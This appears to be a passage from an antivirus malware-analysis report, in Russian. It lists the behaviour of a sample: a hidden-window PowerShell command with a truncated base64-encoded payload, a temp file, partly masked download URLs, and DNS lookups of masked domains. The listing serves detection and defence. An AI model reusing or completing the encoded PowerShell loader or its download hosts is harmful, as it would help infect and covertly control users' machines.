Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABPAHQAZwBrAGQAcQBpAHAAPQAnAFoAZQBrAGMAaQBmAGoAagBxACcAOwAkAFgAbQBmAGYAagBpAHcAcABrACAAPQAgACcANQA5ACcAOwAkAE4AbwB5AG0AegB3AHoAdQB5AHgAcQBmAGoAPQAnAFgAaAB2AHcAZgBhAGEAeQBoAHYAZAA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1560
- %TEMP%\1193984.cvr
- 'cr#####theimdall.com':80
- http://www.cr#####theimdall.com/1ha8us/ek21iei9dl-fab4lvyuw-465996896/
- http://cr#####theimdall.com/1ha8us/ek21iei9dl-fab4lvyuw-465996896/
- DNS ASK de##.##owmatrics.com
- DNS ASK cr#####theimdall.com
- DNS ASK ba#####lluniverso.it
- DNS ASK de##.###dryerventpro.com
- DNS ASK es######nosanagustin.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABPAHQAZwBrAGQAcQBpAHAAPQAnAFoAZQBrAGMAaQBmAGoAagBxACcAOwAkAFgAbQBmAGYAagBpAHcAcABrACAAPQAgACcANQA5ACcAOwAkAE4AbwB5AG0AegB3AHoAdQB5AHgAcQBmAGoAPQAnAFgAaAB2AHcAZgBhAGEAeQBoAHYAZAA...' (со скрытым окном)